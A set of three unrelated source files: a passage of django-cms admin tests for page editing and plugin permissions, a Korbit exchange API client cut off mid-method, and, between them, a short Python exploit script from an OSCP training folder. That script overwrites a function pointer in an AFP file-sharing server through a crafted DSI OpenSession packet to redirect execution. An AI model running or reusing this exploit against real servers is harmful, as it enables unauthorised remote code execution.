with self.login_user_context(admin_user):
self.client.post(admin_url, post_data)
draft_page = Page.objects.get(pk=page.pk).get_draft_object()
self.assertTrue(draft_page.is_dirty('en'))
def test_edit_title_languages(self):
language = "en"
admin_user = self.get_admin()
page = create_page('A', 'nav_playground.html', language)
page_admin = PageAdmin(Page, None)
page_admin._current_page = page
page.publish("en")
draft_page = page.get_draft_object()
admin_url = reverse("admin:cms_page_edit_title_fields", args=(
draft_page.pk, language
))
post_data = {
'title': "A Title"
}
with self.login_user_context(admin_user):
self.client.post(admin_url, post_data)
draft_page = Page.objects.get(pk=page.pk).get_draft_object()
self.assertTrue(draft_page.is_dirty('en'))
def test_page_form_leak(self):
language = "en"
admin_user = self.get_admin()
request = self.get_request('/', 'en')
request.user = admin_user
page = create_page('A', 'nav_playground.html', language, menu_title='menu title')
page_admin = PageAdmin(Page, site)
page_admin._current_page = page
edit_form = page_admin.get_form(request, page)
add_form = page_admin.get_form(request, None)
self.assertEqual(edit_form.base_fields['menu_title'].initial, 'menu title')
self.assertEqual(add_form.base_fields['menu_title'].initial, None)
class NoDBAdminTests(CMSTestCase):
@property
def admin_class(self):
return site._registry[Page]
def test_lookup_allowed_site__exact(self):
self.assertTrue(self.admin_class.lookup_allowed('site__exact', '1'))
def test_lookup_allowed_published(self):
self.assertTrue(self.admin_class.lookup_allowed('published', value='1'))
class PluginPermissionTests(AdminTestsBase):
def setUp(self):
self._page = create_page('test page', 'nav_playground.html', 'en')
self._placeholder = self._page.placeholders.all()[0]
def _get_admin(self):
User = get_user_model()
fields = dict(email="[email protected]", is_staff=True, is_active=True)
if (User.USERNAME_FIELD != 'email'):
fields[User.USERNAME_FIELD] = "admin"
admin_user = User(**fields)
admin_user.set_password('admin')
admin_user.save()
return admin_user
def _get_page_admin(self):
return admin.site._registry[Page]
def _give_permission(self, user, model, permission_type, save=True):
codename = '%s_%s' % (permission_type, model._meta.object_name.lower())
user.user_permissions.add(Permission.objects.get(codename=codename))
def _give_page_permission_rights(self, user):
self._give_permission(user, PagePermission, 'add')
self._give_permission(user, PagePermission, 'change')
self._give_permission(user, PagePermission, 'delete')
def _get_change_page_request(self, user, page):
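        # Lightweight request stand-in built with type(); only the attributes
        # defined below exist on it, which is enough for the inline-visibility
        # checks these tests exercise.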
return type('Request', (object,), {
'user': user,
'path': base.URL_CMS_PAGE_CHANGE % page.pk
})
def _give_cms_permissions(self, user, save=True):
for perm_type in ['add', 'change', 'delete']:
for model in [Page, Title]:
self._give_permission(user, model, perm_type, False)
gpp = GlobalPagePermission.objects.create(
user=user,
can_change=True,
can_delete=True,
can_change_advanced_settings=False,
can_publish=True,
can_change_permissions=False,
can_move_page=True,
)
gpp.sites = Site.objects.all()
if save:
user.save()
def _create_plugin(self):
plugin = add_plugin(self._placeholder, 'TextPlugin', 'en')
return plugin
def test_plugin_add_requires_permissions(self):
"""User tries to add a plugin but has no permissions. He can add the plugin after he got the permissions"""
admin = self._get_admin()
self._give_cms_permissions(admin)
if get_user_model().USERNAME_FIELD == 'email':
self.client.login(username='[email protected]', password='admin')
else:
self.client.login(username='admin', password='admin')
url = admin_reverse('cms_page_add_plugin')
data = {
'plugin_type': 'TextPlugin',
'placeholder_id': self._placeholder.pk,
'plugin_language': 'en',
'plugin_parent': '',
}
response = self.client.post(url, data)
self.assertEqual(response.status_code, HttpResponseForbidden.status_code)
self._give_permission(admin, Text, 'add')
response = self.client.post(url, data)
self.assertEqual(response.status_code, HttpResponse.status_code)
def test_plugin_edit_requires_permissions(self):
"""User tries to edit a plugin but has no permissions. He can edit the plugin after he got the permissions"""
plugin = self._create_plugin()
_, normal_guy = self._get_guys()
if get_user_model().USERNAME_FIELD == 'email':
self.client.login(username='[email protected]', password='[email protected]')
else:
self.client.login(username='test', password='test')
url = admin_reverse('cms_page_edit_plugin', args=[plugin.id])
response = self.client.post(url, dict())
self.assertEqual(response.status_code, HttpResponseForbidden.status_code)
        # Once the permissions are granted, the plugin can be edited
self._give_permission(normal_guy, Text, 'change')
response = self.client.post(url, dict())
self.assertEqual(response.status_code, HttpResponse.status_code)
def test_plugin_edit_wrong_url(self):
"""User tries to edit a plugin using a random url. 404 response returned"""
plugin = self._create_plugin()
_, normal_guy = self._get_guys()
if get_user_model().USERNAME_FIELD == 'email':
self.client.login(username='[email protected]', password='[email protected]')
else:
self.client.login(username='test', password='test')
self._give_permission(normal_guy, Text, 'change')
url = '%s/edit-plugin/%s/' % (admin_reverse('cms_page_edit_plugin', args=[plugin.id]), plugin.id)
response = self.client.post(url, dict())
self.assertEqual(response.status_code, HttpResponseNotFound.status_code)
self.assertTrue("Plugin not found" in force_text(response.content))
def test_plugin_remove_requires_permissions(self):
"""User tries to remove a plugin but has no permissions. He can remove the plugin after he got the permissions"""
plugin = self._create_plugin()
_, normal_guy = self._get_guys()
if get_user_model().USERNAME_FIELD == 'email':
self.client.login(username='[email protected]', password='[email protected]')
else:
self.client.login(username='test', password='test')
url = admin_reverse('cms_page_delete_plugin', args=[plugin.pk])
data = dict(plugin_id=plugin.id)
response = self.client.post(url, data)
self.assertEqual(response.status_code, HttpResponseForbidden.status_code)
        # Once the permissions are granted, the plugin can be removed
self._give_permission(normal_guy, Text, 'delete')
response = self.client.post(url, data)
self.assertEqual(response.status_code, 302)
def test_plugin_move_requires_permissions(self):
"""User tries to move a plugin but has no permissions. He can move the plugin after he got the permissions"""
plugin = self._create_plugin()
_, normal_guy = self._get_guys()
if get_user_model().USERNAME_FIELD == 'email':
self.client.login(username='[email protected]', password='[email protected]')
else:
self.client.login(username='test', password='test')
url = admin_reverse('cms_page_move_plugin')
data = dict(plugin_id=plugin.id,
placeholder_id=self._placeholder.pk,
plugin_parent='',
)
response = self.client.post(url, data)
self.assertEqual(response.status_code, HttpResponseForbidden.status_code)
        # Once the permissions are granted, the plugin can be moved
self._give_permission(normal_guy, Text, 'change')
response = self.client.post(url, data)
self.assertEqual(response.status_code, HttpResponse.status_code)
def test_plugins_copy_requires_permissions(self):
"""User tries to copy plugin but has no permissions. He can copy plugins after he got the permissions"""
plugin = self._create_plugin()
_, normal_guy = self._get_guys()
if get_user_model().USERNAME_FIELD == 'email':
self.client.login(username='[email protected]', password='[email protected]')
else:
self.client.login(username='test', password='test')
url = admin_reverse('cms_page_copy_plugins')
data = dict(source_plugin_id=plugin.id,
source_placeholder_id=self._placeholder.pk,
source_language='en',
target_language='fr',
target_placeholder_id=self._placeholder.pk,
)
response = self.client.post(url, data)
self.assertEqual(response.status_code, HttpResponseForbidden.status_code)
        # Once the permissions are granted, the plugins can be copied
self._give_permission(normal_guy, Text, 'add')
response = self.client.post(url, data)
self.assertEqual(response.status_code, HttpResponse.status_code)
def test_plugins_copy_placeholder_ref(self):
"""
User copies a placeholder into a clipboard. A PlaceholderReferencePlugin
is created. Afterwards he copies this into a placeholder and the
PlaceholderReferencePlugin unpacks its content. After that he clears
the clipboard.
"""
self.assertEqual(Placeholder.objects.count(), 2)
self._create_plugin()
self._create_plugin()
admin_user = self.get_superuser()
clipboard = Placeholder()
clipboard.save()
self.assertEqual(CMSPlugin.objects.count(), 2)
settings = UserSettings(language="fr", clipboard=clipboard, user=admin_user)
settings.save()
self.assertEqual(Placeholder.objects.count(), 3)
if get_user_model().USERNAME_FIELD == 'email':
self.client.login(username='[email protected]', password='[email protected]')
else:
self.client.login(username='admin', password='admin')
url = admin_reverse('cms_page_copy_plugins')
data = dict(source_plugin_id='',
source_placeholder_id=self._placeholder.pk,
source_language='en',
target_language='en',
target_placeholder_id=clipboard.pk,
)
response = self.client.post(url, data)
self.assertEqual(response.status_code, HttpResponse.status_code)
clipboard_plugins = clipboard.get_plugins()
self.assertEqual(CMSPlugin.objects.count(), 5)
self.assertEqual(clipboard_plugins.count(), 1)
self.assertEqual(clipboard_plugins[0].plugin_type, "PlaceholderPlugin")
placeholder_plugin, _ = clipboard_plugins[0].get_plugin_instance()
ref_placeholder = placeholder_plugin.placeholder_ref
copied_plugins = ref_placeholder.get_plugins()
self.assertEqual(copied_plugins.count(), 2)
data = dict(source_plugin_id=placeholder_plugin.pk,
source_placeholder_id=clipboard.pk,
source_language='en',
target_language='fr',
target_placeholder_id=self._placeholder.pk,
)
response = self.client.post(url, data)
self.assertEqual(response.status_code, HttpResponse.status_code)
plugins = self._placeholder.get_plugins()
self.assertEqual(plugins.count(), 4)
self.assertEqual(CMSPlugin.objects.count(), 7)
self.assertEqual(Placeholder.objects.count(), 4)
url = admin_reverse('cms_page_clear_placeholder', args=[clipboard.pk])
with self.assertNumQueries(FuzzyInt(70, 90)):
response = self.client.post(url, {'test': 0})
self.assertEqual(response.status_code, 302)
self.assertEqual(CMSPlugin.objects.count(), 4)
self.assertEqual(Placeholder.objects.count(), 3)
def test_plugins_copy_language(self):
"""User tries to copy plugin but has no permissions. He can copy plugins after he got the permissions"""
self._create_plugin()
_, normal_guy = self._get_guys()
if get_user_model().USERNAME_FIELD != 'email':
self.client.login(username='test', password='test')
else:
self.client.login(username='[email protected]', password='[email protected]')
self.assertEqual(1, CMSPlugin.objects.all().count())
url = admin_reverse('cms_page_copy_language', args=[self._page.pk])
data = dict(
source_language='en',
target_language='fr',
)
response = self.client.post(url, data)
self.assertEqual(response.status_code, HttpResponseForbidden.status_code)
        # Once the permissions are granted, the plugins can be copied to the other language
self._give_permission(normal_guy, Text, 'add')
response = self.client.post(url, data)
self.assertEqual(response.status_code, HttpResponse.status_code)
self.assertEqual(2, CMSPlugin.objects.all().count())
def test_page_permission_inline_visibility(self):
User = get_user_model()
fields = dict(email='[email protected]', password='user', is_staff=True)
if get_user_model().USERNAME_FIELD != 'email':
fields[get_user_model().USERNAME_FIELD] = 'user'
user = User(**fields)
user.save()
self._give_page_permission_rights(user)
page = create_page('A', 'nav_playground.html', 'en')
page_permission = PagePermission.objects.create(
can_change_permissions=True, user=user, page=page)
request = self._get_change_page_request(user, page)
page_admin = PageAdmin(Page, AdminSite())
page_admin._current_page = page
# user has can_change_permission
# => must see the PagePermissionInline
self.assertTrue(
any(type(inline) is PagePermissionInlineAdmin
for inline in page_admin.get_inline_instances(request, page)))
page = Page.objects.get(pk=page.pk)
# remove can_change_permission
page_permission.can_change_permissions = False
page_permission.save()
request = self._get_change_page_request(user, page)
page_admin = PageAdmin(Page, AdminSite())
page_admin._current_page = page
# => PagePermissionInline is no longer visible
self.assertFalse(
any(type(inline) is PagePermissionInlineAdmin
for inline in page_admin.get_inline_instances(request, page)))
def test_edit_title_is_allowed_for_staff_user(self):
"""
We check here both the permission on a single page, and the global permissions
"""
user = self._create_user('user', is_staff=True)
another_user = self._create_user('another_user', is_staff=True)
page = create_page('A', 'nav_playground.html', 'en')
admin_url = reverse("admin:cms_page_edit_title_fields", args=(
page.pk, 'en'
))
page_admin = PageAdmin(Page, None)
page_admin._current_page = page
username = getattr(user, get_user_model().USERNAME_FIELD)
self.client.login(username=username, password=username)
response = self.client.get(admin_url)
self.assertEqual(response.status_code, HttpResponseForbidden.status_code)
assign_user_to_page(page, user, grant_all=True)
username = getattr(user, get_user_model().USERNAME_FIELD)
self.client.login(username=username, password=username)
response = self.client.get(admin_url)
self.assertEqual(response.status_code, HttpResponse.status_code)
self._give_cms_permissions(another_user)
username = getattr(another_user, get_user_model().USERNAME_FIELD)
self.client.login(username=username, password=username)
response = self.client.get(admin_url)
self.assertEqual(response.status_code, HttpResponse.status_code)
def test_plugin_add_returns_valid_pk_for_plugin(self):
admin_user = self._get_admin()
self._give_cms_permissions(admin_user)
self._give_permission(admin_user, Text, 'add')
username = getattr(admin_user, get_user_model().USERNAME_FIELD)
self.client.login(username=username, password='admin')
url = admin_reverse('cms_page_add_plugin')
data = {
'plugin_type': 'TextPlugin',
'placeholder_id': self._placeholder.pk,
'plugin_language': 'en',
'plugin_parent': '',
}
response = self.client.post(url, data)
self.assertEqual(response.status_code, HttpResponse.status_code)
self.assertEqual(response['content-type'], 'application/json')
pk = response.content.decode('utf8').split("edit-plugin/")[1].split("/")[0]
self.assertTrue(CMSPlugin.objects.filter(pk=int(pk)).exists())
class AdminFormsTests(AdminTestsBase):
def test_clean_overwrite_url(self):
user = AnonymousUser()
user.is_superuser = True
user.pk = 1
request = type('Request', (object,), {'user': user})
with self.settings():
data = {
'title': 'TestPage',
'slug': 'test-page',
'language': 'en',
'overwrite_url': '/overwrite/url/',
'site': Site.objects.get_current().pk,
'template': get_cms_setting('TEMPLATES')[0][0],
'published': True
}
form = PageForm(data)
self.assertTrue(form.is_valid(), form.errors.as_text())
instance = form.save()
instance.permission_user_cache = user
instance.permission_advanced_settings_cache = True
Title.objects.set_or_create(request, instance, form, 'en')
form = PageForm(data, instance=instance)
self.assertTrue(form.is_valid(), form.errors.as_text())
def test_mismatching_site_parent_dotsite(self):
site0 = Site.objects.create(domain='foo.com', name='foo.com')
site1 = Site.objects.create(domain='foo2.com', name='foo.com')
parent_page = Page.objects.create(
template='nav_playground.html',
site=site0)
new_page_data = {
'title': 'Title',
'slug': 'slug',
'language': 'en',
'site': site1.pk,
'template': get_cms_setting('TEMPLATES')[0][0],
'reverse_id': '',
'parent': parent_page.pk,
}
form = PageForm(data=new_page_data, files=None)
self.assertFalse(form.is_valid())
self.assertIn(u"Site doesn't match the parent's page site",
form.errors['__all__'])
def test_form_errors(self):
new_page_data = {
'title': 'Title',
'slug': 'home',
'language': 'en',
'site': 10,
'template': get_cms_setting('TEMPLATES')[0][0],
'reverse_id': '',
}
form = PageForm(data=new_page_data, files=None)
self.assertFalse(form.is_valid())
site0 = Site.objects.create(domain='foo.com', name='foo.com', pk=2)
page1 = api.create_page("test", get_cms_setting('TEMPLATES')[0][0], "fr", site=site0)
new_page_data = {
'title': 'Title',
'slug': 'home',
'language': 'en',
'site': 1,
'template': get_cms_setting('TEMPLATES')[0][0],
'reverse_id': '',
'parent': page1.pk,
}
form = PageForm(data=new_page_data, files=None)
self.assertFalse(form.is_valid())
new_page_data = {
'title': 'Title',
'slug': '#',
'language': 'en',
'site': 1,
'template': get_cms_setting('TEMPLATES')[0][0],
'reverse_id': '',
}
form = PageForm(data=new_page_data, files=None)
self.assertFalse(form.is_valid())
new_page_data = {
'title': 'Title',
'slug': 'home',
'language': 'pp',
'site': 1,
'template': get_cms_setting('TEMPLATES')[0][0],
'reverse_id': '',
'parent':'',
}
form = PageForm(data=new_page_data, files=None)
self.assertFalse(form.is_valid())
page2 = api.create_page("test", get_cms_setting('TEMPLATES')[0][0], "en")
new_page_data = {
'title': 'Title',
'slug': 'test',
'language': 'en',
'site': 1,
'template': get_cms_setting('TEMPLATES')[0][0],
'reverse_id': '',
'parent':'',
}
form = PageForm(data=new_page_data, files=None)
self.assertFalse(form.is_valid())
page3 = api.create_page("test", get_cms_setting('TEMPLATES')[0][0], "en", parent=page2)
page3.title_set.update(path="hello/")
page3 = page3.reload()
new_page_data = {
'title': 'Title',
'slug': 'test',
'language': 'en',
'site': 1,
'template': get_cms_setting('TEMPLATES')[0][0],
'reverse_id': '',
'parent':'',
}
form = PageForm(data=new_page_data, files=None, instance=page3)
self.assertFalse(form.is_valid())
def test_reverse_id_error_location(self):
''' Test moving the reverse_id validation error to a field-specific one '''
# this is the Reverse ID we'll re-use to break things.
dupe_id = 'p1'
current_site = Site.objects.get_current()
create_page('Page 1', 'nav_playground.html', 'en', reverse_id=dupe_id)
page2 = create_page('Page 2', 'nav_playground.html', 'en')
# Assemble a bunch of data to test the page form
page2_data = {
'language': 'en',
'site': current_site.pk,
'reverse_id': dupe_id,
'template': 'col_two.html',
}
form = AdvancedSettingsForm(data=page2_data, files=None)
self.assertFalse(form.is_valid())
# reverse_id is the only item that is in __all__ as every other field
# has its own clean method. Moving it to be a field error means
# __all__ is no longer available.
self.assertNotIn('__all__', form.errors)
# In moving it to its own field, it should be in form.errors, and
# the values contained therein should match these.
self.assertIn('reverse_id', form.errors)
self.assertEqual(1, len(form.errors['reverse_id']))
self.assertEqual([u'A page with this reverse URL id exists already.'],
form.errors['reverse_id'])
page2_data['reverse_id'] = ""
form = AdvancedSettingsForm(data=page2_data, files=None)
self.assertTrue(form.is_valid())
admin_user = self._get_guys(admin_only=True)
# reset some of page2_data so we can use cms.api.create_page
page2 = page2.reload()
page2.site = current_site
page2.save()
with self.login_user_context(admin_user):
# re-reset the page2_data for the admin form instance.
page2_data['reverse_id'] = dupe_id
page2_data['site'] = current_site.pk
# post to the admin change form for page 2, and test that the
# reverse_id form row has an errors class. Django's admin avoids
# collapsing these, so that the error is visible.
resp = self.client.post(base.URL_CMS_PAGE_ADVANCED_CHANGE % page2.pk, page2_data)
self.assertContains(resp, '<div class="form-row errors reverse_id">')
def test_create_page_type(self):
page = create_page('Test', 'static.html', 'en', published=True, reverse_id="home")
for placeholder in Placeholder.objects.all():
add_plugin(placeholder, TextPlugin, 'en', body='<b>Test</b>')
page.publish('en')
self.assertEqual(Page.objects.count(), 2)
self.assertEqual(CMSPlugin.objects.count(), 4)
superuser = self.get_superuser()
with self.login_user_context(superuser):
response = self.client.get(
"%s?copy_target=%s&language=%s" % (admin_reverse("cms_page_add_page_type"), page.pk, 'en'))
self.assertEqual(response.status_code, 302)
self.assertEqual(Page.objects.count(), 3)
self.assertEqual(Page.objects.filter(reverse_id="page_types").count(), 1)
page_types = Page.objects.get(reverse_id='page_types')
url = response.url if hasattr(response, 'url') else response['Location']
expected_url_params = QueryDict(
'target=%s&position=first-child&add_page_type=1&copy_target=%s&language=en' % (page_types.pk, page.pk))
response_url_params = QueryDict(urlparse(url).query)
self.assertDictEqual(expected_url_params, response_url_params)
response = self.client.get("%s?copy_target=%s&language=%s" % (
admin_reverse("cms_page_add_page_type"), page.pk, 'en'), follow=True)
self.assertEqual(response.status_code, 200)
# test that no page types are offered when none exist yet
response = self.client.get(admin_reverse('cms_page_add'))
self.assertNotContains(response, "page_type")
# create our first page type
page_data = {
'title': 'type1', 'slug': 'type1', '_save': 1, 'template': 'static.html', 'site': 1,
'language': 'en'
}
response = self.client.post(
"%s?target=%s&position=first-child&add_page_type=1©_target=%s&language=en" % (
URL_CMS_PAGE_ADD, page_types.pk, page.pk
), data=page_data)
self.assertEqual(response.status_code, 302)
self.assertEqual(Page.objects.count(), 4)
self.assertEqual(CMSPlugin.objects.count(), 6)
response = self.client.get(admin_reverse('cms_page_add'))
self.assertContains(response, "page_type")
# no page types available if you use the copy_target
response = self.client.get("%s?copy_target=%s&language=en" % (admin_reverse('cms_page_add'), page.pk))
self.assertNotContains(response, "page_type")
def test_render_edit_mode(self):
from django.core.cache import cache
cache.clear()
create_page('Test', 'static.html', 'en', published=True)
for placeholder in Placeholder.objects.all():
add_plugin(placeholder, TextPlugin, 'en', body='<b>Test</b>')
user = self.get_superuser()
self.assertEqual(Placeholder.objects.all().count(), 4)
with self.login_user_context(user):
output = force_text(
self.client.get(
'/en/?%s' % get_cms_setting('CMS_TOOLBAR_URL__EDIT_ON')
).content
)
self.assertIn('<b>Test</b>', output)
self.assertEqual(Placeholder.objects.all().count(), 9)
self.assertEqual(StaticPlaceholder.objects.count(), 2)
for placeholder in Placeholder.objects.all():
add_plugin(placeholder, TextPlugin, 'en', body='<b>Test</b>')
output = force_text(
self.client.get(
'/en/?%s' % get_cms_setting('CMS_TOOLBAR_URL__EDIT_ON')
).content
)
self.assertIn('<b>Test</b>', output)
def test_tree_view_queries(self):
from django.core.cache import cache
cache.clear()
for i in range(10):
create_page('Test%s' % i, 'col_two.html', 'en', published=True)
for placeholder in Placeholder.objects.all():
add_plugin(placeholder, TextPlugin, 'en', body='<b>Test</b>')
user = self.get_superuser()
with self.login_user_context(user):
with self.assertNumQueries(FuzzyInt(18, 33)):
force_text(self.client.get(URL_CMS_PAGE))
def test_smart_link_published_pages(self):
admin, staff_guy = self._get_guys()
page_url = URL_CMS_PAGE_PUBLISHED # Not sure how to achieve this with reverse...
with self.login_user_context(staff_guy):
multi_title_page = create_page('main_title', 'col_two.html', 'en', published=True,
overwrite_url='overwritten_url',
menu_title='menu_title')
title = multi_title_page.get_title_obj()
title.page_title = 'page_title'
title.save()
multi_title_page.save()
publish_page(multi_title_page, admin, 'en')
# A non-AJAX call should return a 403, as this page should only be accessed via AJAX queries
self.assertEqual(403, self.client.get(page_url).status_code)
self.assertEqual(200,
self.client.get(page_url, HTTP_X_REQUESTED_WITH='XMLHttpRequest').status_code
)
# Test that the query param is working as expected.
self.assertEqual(1, len(json.loads(self.client.get(page_url, {'q':'main_title'},
HTTP_X_REQUESTED_WITH='XMLHttpRequest').content.decode("utf-8"))))
self.assertEqual(1, len(json.loads(self.client.get(page_url, {'q':'menu_title'},
HTTP_X_REQUESTED_WITH='XMLHttpRequest').content.decode("utf-8"))))
self.assertEqual(1, len(json.loads(self.client.get(page_url, {'q':'overwritten_url'},
HTTP_X_REQUESTED_WITH='XMLHttpRequest').content.decode("utf-8"))))
self.assertEqual(1, len(json.loads(self.client.get(page_url, {'q':'page_title'},
HTTP_X_REQUESTED_WITH='XMLHttpRequest').content.decode("utf-8"))))
class AdminPageEditContentSizeTests(AdminTestsBase):
"""
The number of system users influences the size of the page edit page,
but each username is present only twice on the page.
The test relates to extra=0
at PagePermissionInlineAdminForm and ViewRestrictionInlineAdmin.
"""
def test_editpage_contentsize(self):
"""
Expect each username to appear only twice in the content, while the page
size grows with the number of users in the system.
"""
with self.settings(CMS_PERMISSION=True):
admin_user = self.get_superuser()
PAGE_NAME = 'TestPage'
USER_NAME = 'test_size_user_0'
current_site = Site.objects.get(pk=1)
page = create_page(PAGE_NAME, "nav_playground.html", "en", site=current_site, created_by=admin_user)
page.save()
self._page = page
with self.login_user_context(admin_user):
url = base.URL_CMS_PAGE_PERMISSION_CHANGE % self._page.pk
response = self.client.get(url)
self.assertEqual(response.status_code, 200)
old_response_size = len(response.content)
old_user_count = get_user_model().objects.count()
# create an additional user and reload the page
get_user_model().objects.create_user(username=USER_NAME, email=USER_NAME + '@django-cms.org',
password=USER_NAME)
user_count = get_user_model().objects.count()
more_users_in_db = old_user_count < user_count
# we have more users
self.assertTrue(more_users_in_db, "New users got NOT created")
response = self.client.get(url)
new_response_size = len(response.content)
page_size_grown = old_response_size < new_response_size
# expect that the page size is influenced by the number of users in the system
self.assertTrue(page_size_grown, "Page size has not grown after user creation")
# usernames appear only twice in the content
text = smart_str(response.content, response.charset)
foundcount = text.count(USER_NAME)
# 2 forms contain usernames as options
self.assertEqual(foundcount, 2,
"Username %s appeared %s times in response.content, expected 2 times" % (
USER_NAME, foundcount))
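# A sketch of the FuzzyInt helper used in test_tree_view_queries above
# (an assumed implementation, named FuzzyIntSketch to avoid shadowing the
# imported helper): an int that compares equal to anything in
# [lowest, highest], which lets assertNumQueries tolerate a range of counts.
class FuzzyIntSketch(int):
    def __new__(cls, lowest, highest):
        obj = super(FuzzyIntSketch, cls).__new__(cls, highest)
        obj.lowest = lowest
        obj.highest = highest
        return obj

    def __eq__(self, other):
        return self.lowest <= other <= self.highest

    def __repr__(self):
        return "[%d..%d]" % (self.lowest, self.highest)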
| {
"content_hash": "18712b0c550b9a8d7ab6e5cda793ad1f",
"timestamp": "",
"source": "github",
"line_count": 1681,
"max_line_length": 129,
"avg_line_length": 45.616894705532424,
"alnum_prop": 0.5935812837432514,
"repo_name": "vxsx/django-cms",
"id": "2112f6db0ab0814bc6770199a24a13d98b3173cd",
"size": "76706",
"binary": false,
"copies": "1",
"ref": "refs/heads/develop",
"path": "cms/tests/test_admin.py",
"mode": "33188",
"license": "bsd-3-clause",
"language": [
{
"name": "CSS",
"bytes": "133419"
},
{
"name": "HTML",
"bytes": "154109"
},
{
"name": "JavaScript",
"bytes": "1172445"
},
{
"name": "Python",
"bytes": "1996894"
},
{
"name": "Shell",
"bytes": "28"
}
],
"symlink_target": ""
} |
import socket
import struct
import sys
if len(sys.argv) != 3:
sys.exit(0)
ip = sys.argv[1]
port = int(sys.argv[2])
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
print "[+] Attempting connection to " + ip + ":" + sys.argv[2]
sock.connect((ip, port))
dsi_payload = "\x00\x00\x40\x00" # client quantum
dsi_payload += '\x00\x00\x00\x00' # overwrites datasize
dsi_payload += struct.pack("I", 0xdeadbeef) # overwrites quantum
dsi_payload += struct.pack("I", 0xfeedface) # overwrites the ids
dsi_payload += struct.pack("Q", 0x63b660) # overwrite commands ptr
dsi_opensession = "\x01" # attention quantum option
dsi_opensession += struct.pack("B", len(dsi_payload)) # length
dsi_opensession += dsi_payload
dsi_header = "\x00" # "request" flag
dsi_header += "\x04" # open session command
dsi_header += "\x00\x01" # request id
dsi_header += "\x00\x00\x00\x00" # data offset
dsi_header += struct.pack(">I", len(dsi_opensession))
dsi_header += "\x00\x00\x00\x00" # reserved
dsi_header += dsi_opensession
sock.sendall(dsi_header)
resp = sock.recv(1024)
print "[+] Open Session complete"
afp_command = "\x01" # invoke the second entry in the table
afp_command += "\x00" # protocol defined padding
afp_command += "\x00\x00\x00\x00\x00\x00" # pad out the first entry
afp_command += struct.pack("Q", 0x4295f0) # address to jump to
dsi_header = "\x00" # "request" flag
dsi_header += "\x02" # "AFP" command
dsi_header += "\x00\x02" # request id
dsi_header += "\x00\x00\x00\x00" # data offset
dsi_header += struct.pack(">I", len(afp_command))
dsi_header += '\x00\x00\x00\x00' # reserved
dsi_header += afp_command
print "[+] Sending get server info request"
sock.sendall(dsi_header)
resp = sock.recv(1024)
print(resp)
print("[+] Fin.")
| {
"content_hash": "539ddffca1bd7d7bdc9dab6a06621519",
"timestamp": "",
"source": "github",
"line_count": 45,
"max_line_length": 67,
"avg_line_length": 38.733333333333334,
"alnum_prop": 0.6855995410212278,
"repo_name": "cappetta/SecDevOps-Toolkit",
"id": "1c7938b80e9c4b8704923d26b30a3cc6215f32e3",
"size": "1743",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "training/oscp/exploit/test.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Batchfile",
"bytes": "1036"
},
{
"name": "Dockerfile",
"bytes": "1371"
},
{
"name": "Gherkin",
"bytes": "617"
},
{
"name": "HCL",
"bytes": "44766"
},
{
"name": "PHP",
"bytes": "80"
},
{
"name": "PowerShell",
"bytes": "15519"
},
{
"name": "Python",
"bytes": "47224"
},
{
"name": "Ruby",
"bytes": "14396"
},
{
"name": "Shell",
"bytes": "11885"
}
],
"symlink_target": ""
} |
import time
from .public_api import PublicAPI
class PrivateAPI(PublicAPI):
def __init__(self, client_id, secret, production=True, version="v1", timeout=20):
# Note: name the class explicitly; super(self.__class__, ...) would recurse
# forever if PrivateAPI were ever subclassed.
try:
    super(PrivateAPI, self).__init__(production, version, timeout)
except TypeError:
    PublicAPI.__init__(self, production, version, timeout)
self.__client_id = client_id
self.__secret = secret
self.__token = {}
# https://apidocs.korbit.co.kr/#authentication
def create_token_directly(self):
payload = {
'client_id': self.__client_id,
'client_secret': self.__secret,
'grant_type': "client_credentials"
}
self.__token = self.request_post("oauth2/access_token", data=payload)
return self.__token
def set_token(self, token):
self.__token = token
def refresh_token(self):
payload = {
'client_id': self.__client_id,
'client_secret': self.__secret,
'refresh_token': self.__token['refresh_token'],
'grant_type': "refresh_token"
}
self.__token = self.request_post("oauth2/access_token", data=payload)
return self.__token
def get_user_info(self):
return self.request_get("user/info", headers=self.headers)
@property
def headers(self):
return {
'Accept': 'application/json',
'Authorization': "{} {}".format(self.__token['token_type'], self.__token['access_token'])
}
# https://apidocs.korbit.co.kr/#exchange
def bid_order(self, bid_type, coin_amount=None, price=None, fiat_amount=None, currency_pair="btc_krw"):
payload = {
'type': bid_type,
'currency_pair': currency_pair,
'price': price,
'coin_amount': coin_amount,
'fiat_amount': fiat_amount,
'nonce': self.nonce
}
return self.request_post("user/orders/buy", headers=self.headers, data=payload)
def market_bid_order(self, fiat_amount, currency_pair="btc_krw"):
return self.bid_order('market', fiat_amount=fiat_amount, currency_pair=currency_pair)
def limit_bid_order(self, coin_amount, price, currency_pair="btc_krw"):
return self.bid_order('limit', coin_amount=coin_amount, price=price, currency_pair=currency_pair)
def ask_order(self, ask_type, coin_amount, price=None, currency_pair="btc_krw"):
payload = {
'type': ask_type,
'currency_pair': currency_pair,
'price': price,
'coin_amount': coin_amount,
'nonce': self.nonce
}
return self.request_post("user/orders/sell", headers=self.headers, data=payload)
def market_ask_order(self, coin_amount, currency_pair="btc_krw"):
return self.ask_order('market', coin_amount=coin_amount, currency_pair=currency_pair)
def limit_ask_order(self, coin_amount, price, currency_pair="btc_krw"):
return self.ask_order('limit', coin_amount, price, currency_pair)
def cancel_order(self, ids, currency_pair="btc_krw"):
payload = {
'id': ids,
'currency_pair': currency_pair,
'nonce': self.nonce
}
return self.request_post("user/orders/cancel", headers=self.headers, data=payload)
def list_open_orders(self, offset=0, limit=10, currency_pair="btc_krw"):
params = {
'currency_pair': currency_pair,
'offset': offset,
'limit': limit
}
return self.request_get("user/orders/open", headers=self.headers, params=params)
def view_exchange_orders(self, offset=0, limit=10, currency_pair="btc_krw"):
params = {
'currency_pair': currency_pair,
'offset': offset,
'limit': limit
}
return self.request_get("user/orders", headers=self.headers, params=params)
def view_transfers(self, offset=0, limit=10, currency="btc"):
params = {
'currency': currency,
'offset': offset,
'limit': limit
}
return self.request_get("user/transfers", headers=self.headers, params=params)
def trading_volume_and_fees(self, currency_pair="all"):
params = {
'currency_pair': currency_pair
}
return self.request_get("user/volume", headers=self.headers, params=params)
# https://apidocs.korbit.co.kr/#wallet
def user_balances(self):
return self.request_get("user/balances", headers=self.headers)
def user_accounts(self):
return self.request_get("user/accounts", headers=self.headers)
def retrieve_wallet_status(self, currency_pair="btc_krw"):
params = {
'currency_pair': currency_pair
}
return self.request_get("user/wallet", headers=self.headers, params=params)
def assign_btc_address(self, currency="btc"):
payload = {
